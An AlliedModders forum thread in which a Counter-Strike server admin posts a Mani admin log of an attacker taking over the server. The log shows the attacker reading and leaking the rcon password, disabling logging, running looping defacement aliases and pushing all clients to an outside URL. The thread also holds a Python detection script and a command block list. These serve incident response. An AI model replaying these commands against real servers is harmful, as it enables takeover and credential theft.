AlliedModders


zeroibis 11-02-2009 19:53

New RCON exploit
 
Quote:

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon log off

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset rcon 0

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xcopy rcon rcon_password

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset player 0

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xgetuserid player CaM

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_tell server_var(player) #multi #green rcon_password is: #default server_var(rcon)
M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon log off

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset rcon 0

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xcopy rcon rcon_password

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset player 0

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xgetuserid player CaM

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_tell server_var(player) #multi #green rcon_password is: #default server_var(rcon)
M 11/02/2009 - 16:59:35: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon toggle rcon_password balls
M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 8 "est_playplayer #A radio/roger.wav;es_delayed 0.1 8"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 23 "ma_rcon_Password penis313;es_Delayed 5 23"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 13 "est_effect 10 #a 0 sprites/lgtning.vmt -1150.552246 172.520111 6032.485352 50 220 0.4 10 50 0 255 0 0 200 0;es_delayed 0.1 13"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 12 "est_fade #A 15 999 0 0 0 255 80;es_delayed 0.1 12"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 11 "est_fade #A 15 999 0 0 255 0 80;es_delayed 0.1 11"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 10 "est_fade #A 15 999 0 255 0 0 80;es_delayed 0.1 10"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 9 "es_msg CaM Hacked The Server!!;es_delayed 0.1 9"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 7 "es_msg #lightgreen CaM Hacked The Server!!;es_delayed 0.1 7"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 6 "es_msg #green CaM Hacked The Server!!;es_delayed 0.1 6"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 52 "est_endround LOL 1;es_delayed 1 52"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 53 "est_shake #A 1 200 200;es_delayed 1 53"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 8

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 23

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 13

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 12

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 11

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 10

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 9

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 7

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 6

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 52

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 53
M 11/02/2009 - 17:00:51: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon sv_password 123
M 11/02/2009 - 17:01:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_cexec_all "ma_browse http://elenore.airinoff.com/cameron/"
M 11/02/2009 - 17:01:17: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_cexec_all "ma_browse http://elenore.airinoff.com/cameron/"
I am running latest SM ES MM 1.7.1 using RCON locker and kerigan anti cheat. I am running mani obviously and WCS.

Also replaced contents of clients.txt with his own data for two other steam accounts in addition to the one used for the hack.

CLIENT UPLOADED THEIR OWN FILE to server!
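An added example, not part of the original post or of any plugin named in this thread: a small Python triage script that flags the patterns visible in the quoted Mani log (logging switched off, reads or changes of rcon_password, sv_password changes, ma_cexec_all, self-rescheduling aliases, and same-second command bursts). The sample lines are constructed in the quoted format; the rule names, placeholder SteamIDs and burst threshold are assumptions.

```python
import re
from collections import Counter

# Line format as it appears in the quoted Mani admin log.
LINE_RE = re.compile(
    r"^M (?P<ts>\d{2}/\d{2}/\d{4} - \d{2}:\d{2}:\d{2}): \[MANI_ADMIN_PLUGIN\] "
    r"Admin \[(?P<name>.*?)\] \[(?P<steam>STEAM_\d:\d:\d+)\] Executed : (?P<cmd>.*)$")
# Rule names are labels chosen for this example, not Mani or SourceMod terms.
RULES = [
    ("logging_disabled", re.compile(r"^ma_rcon\s+log\s+off\b", re.I)),
    ("rcon_password_access", re.compile(r"^ma_rcon\b.*rcon_password", re.I)),
    ("server_password_change", re.compile(r"^ma_rcon\s+sv_password\b", re.I)),
    ("mass_client_exec", re.compile(r"^ma_cexec_all\b", re.I)),
    # alias N "...;es_delayed <t> N": an alias that keeps re-queuing itself
    ("self_rescheduling_alias", re.compile(
        r'^ma_rcon\s+alias\s+(\S+)\s+".*es_delayed\s+[\d.]+\s+\1"\s*$', re.I)),
]
BURST_THRESHOLD = 3  # assumed: commands per admin per second that suggest a script

def analyze(lines):
    """Return (timestamp, steam_id, rule) findings for Mani admin log lines."""
    findings, per_second = [], Counter()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a Mani "Executed" entry
        per_second[(m["ts"], m["steam"])] += 1
        for rule, rx in RULES:
            if rx.search(m["cmd"]):
                findings.append((m["ts"], m["steam"], rule))
    for (ts, steam), count in per_second.items():
        if count >= BURST_THRESHOLD:
            findings.append((ts, steam, "command_burst"))
    return findings

def _line(ts, steam, cmd):
    return (f"M 11/02/2009 - {ts}: [MANI_ADMIN_PLUGIN] Admin [Example] "
            f"[{steam}] Executed : {cmd}")

SAMPLE = [  # constructed input with placeholder admin and SteamIDs
    _line("10:00:00", "STEAM_0:0:1", "ma_rcon log off"),
    _line("10:00:00", "STEAM_0:0:1", "ma_rcon es_xset rcon 0"),
    _line("10:00:00", "STEAM_0:0:1", "ma_rcon es_xcopy rcon rcon_password"),
    _line("10:00:30", "STEAM_0:0:1", 'ma_rcon alias 9 "es_msg hi;es_delayed 0.1 9"'),
    _line("10:01:00", "STEAM_0:0:1", 'ma_cexec_all "ma_browse http://example.invalid/"'),
    _line("10:02:00", "STEAM_0:1:2", "ma_kick somebody"),
]
if __name__ == "__main__":
    print(*analyze(SAMPLE), sep="\n")
```

Because the first command in the quoted sequence is `ma_rcon log off`, later activity may never reach the log; treat that single finding as a reason to check file changes and clients.txt directly.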

thetwistedpanda 11-02-2009 19:59

Re: New RCON exploit
 
Kerigan's Anti Cheat? Someone's been playing a little Star Craft.

I tried to tell you this in steam chat zero, but there are quite a few Mani takeover scripts going around that do not require sv_cheats or rcon access; it's why I was recommending you rid your servers of it. That being said, this was one of those Mani takeover scripts. Sadly, the author of the script sells it for $15 a pop so they're becoming more and more prevalent. However, you should make sure you have the latest EventScripts version because that may be how your server was targeted (outdated ES has a few nice security holes). Aside from that, I can't stress enough that you get rid of Mani until it's completely fixed (which may never happen).

retsam 11-02-2009 20:07

Re: New RCON exploit
 
Mani = bad mkay? :)

thetwistedpanda 11-02-2009 20:08

Re: New RCON exploit
 
If you'd get on steam Zero, I'd like to discuss something with you.

zeroibis 11-02-2009 20:13

Re: New RCON exploit
 
Will do although it looks like random python files have been altered last night on the server and only on this server...

zeroibis 11-02-2009 20:16

Re: New RCON exploit
 
Yea, I plan to toss mani out as soon as vb4 comes out :D

devicenull 11-02-2009 20:38

Re: New RCON exploit
 
It's Mani. Remove it and you will be fine. This isn't new at all, a bit of searching would have revealed.. this

zeroibis 11-02-2009 20:45

Re: New RCON exploit
 
devicenull, please use your uber programming voodoo magic to fix this until VB4.0 comes out. I got to hold off until then because my sm and vbb databases are merged and the update could kill sourcebans and thus I am delaying the move until 4.0 is released and my plugin that links admins to vbb is shown to work without problem.

So until that can happen I need your uber mods to be updated to protect me! I can send you the souls of a thousand hackers for you to use in making the update if needed!

I tried using an es script called exploit to block ma_rcon but it returns: es_xflags: Could not find var or command: ma_rcon

so maybe it can be done in sm b/c es sux...

devicenull 11-02-2009 21:35

Re: New RCON exploit
 
It won't help.. the exploit relies on the changelevel command. For some reason mani fucks this up which means it can execute commands somehow. RCON lock attempts to block it, but depending how mani is installed, it may not.

In rcon lock, find this:
Code:

new String:cheat_flag[][] = { "dumpcountedstrings", "dbghist_dump", "dumpeventqueue", "dump_globals", "physics_select"
        , "physics_debug_entity", "dump_entity_sizes", "dumpentityfactories", "dump_terrain", "mp_dump_timers", "dumpcountedstrings"
        , "mem_dump", "soundscape_flush", "groundlist", "soundlist", "report_touchlinks", "report_entities", "physics_report_active"
        , "listmodels" };

Replace with:
Code:

new String:cheat_flag[][] = { "dumpcountedstrings", "dbghist_dump", "dumpeventqueue", "dump_globals", "physics_select"
        , "physics_debug_entity", "dump_entity_sizes", "dumpentityfactories", "dump_terrain", "mp_dump_timers", "dumpcountedstrings"
        , "mem_dump", "soundscape_flush", "groundlist", "soundlist", "report_touchlinks", "report_entities", "physics_report_active"
        , "listmodels", "changelevel","ma_rcon" };

This may or may not fix the issue you are seeing.

10000000 11-02-2009 23:45

Re: New RCON exploit
 
Disable rcon and create something similar using sourcemod


All times are GMT -4.